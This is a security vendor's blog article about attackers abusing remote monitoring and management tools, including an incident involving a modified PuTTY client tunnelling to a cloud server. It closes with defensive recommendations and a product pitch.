As more people work remotely, IT departments must manage devices distributed over different cities and countries relying on VPNs and remote monitoring and management (RMM) tools for system administration.
However, like any new technology, RMM tools can also be used maliciously. Threat actors can establish connections to a victim’s device and run commands, exfiltrate data, and stay undetected.
This article will cover real-world examples of RMM exploits and show you how to protect your organization from these attacks.
RMM software simplifies network management, allowing IT professionals to remotely solve problems, install software, and upload or download files to or from devices.
Unfortunately, this connection is not always secure, and attackers can use malicious software to connect their servers to a victim’s device. As these connections become easier to detect, however, ransomware-as-a-service (RaaS) groups have had to adjust their methods.
In most of the cyber incidents Varonis investigated last year, RaaS gangs employed a technique known as Living off the Land, using legitimate IT tools to gain remote control, navigate networks undetected, and steal data.
RMM tools enable attackers to blend in and evade detection. They and their traffic are typically “ignored” by security controls and organizational security policies, such as application whitelisting.
This tactic also helps script kiddies — once connected, they will find everything they need already installed and ready for them.
Our research identified two main methods attackers use to manipulate RMM tools:
Below are common RMM tools and RaaS gangs:
During a recent investigation, our Managed Data Detection and Response (MDDR) team analyzed an organization’s data and found, in the PowerShell history of a compromised device, evidence of an RMM tool named “KiTTY.”
This software was a modified version of PuTTY, a well-known tool for creating telnet and SSH sessions with remote machines. Because PuTTY is a legitimate RMM tool, none of the organization’s security software raised any red flags, so KiTTY was able to create reverse tunnels over port 443 to expose internal servers to an AWS EC2 box.
The Varonis team conducted a comprehensive analysis. They found that the sessions to the AWS EC2 box using KiTTY were key to revealing what happened, how it was done, and — most importantly — what files were stolen.
This crucial evidence was a turning point in the investigation and helped trace the entire attack chain. It also revealed the organization’s security gaps, how to address them, and the potential consequences of this attack.
Consider implementing the following strategies to reduce the chance of attackers abusing RMM tools.
Restrict your organization from using multiple RMM tools by enforcing an application control policy:
One option is to create a Windows Defender Application Control (WDAC) policy using PowerShell that whitelists applications based on their publisher. It’s important to note that creating WDAC policies requires administrative privileges, and deploying them via Group Policy requires domain administrative privileges.
As a precaution, you should test the policy in audit mode before deploying it in enforce mode to avoid inadvertently blocking necessary applications.
Monitor your network traffic and logs, especially regarding RMM tools. Consider implementing services like Varonis MDDR, which provides 24x7x365 network monitoring and behavioral analysis.
Train your employees to identify phishing attempts and manage passwords effectively, as manipulating users is a common way attackers gain access to your network. Encourage the reporting of suspicious activity and regularly test your cybersecurity team to identify potential risks.
As technology advances, it gives an edge to both defenders and attackers, and RMM tools are just one example of the potential threats orgs face.
At Varonis, our mission is to protect what matters most: your data. Our all-in-one Data Security Platform continuously discovers and classifies critical data, removes exposures, and stops threats in real time with AI-powered automation.
Curious to see what risks might be prevalent in your environment? Get a Varonis Data Risk Assessment today.
Our free assessment takes just minutes to set up and delivers immediate value. In less than 24 hours, you’ll have a clear, risk-based view of the data that matters most and a clear path to automated remediation.
Note: This article originally appeared on the Varonis blog.
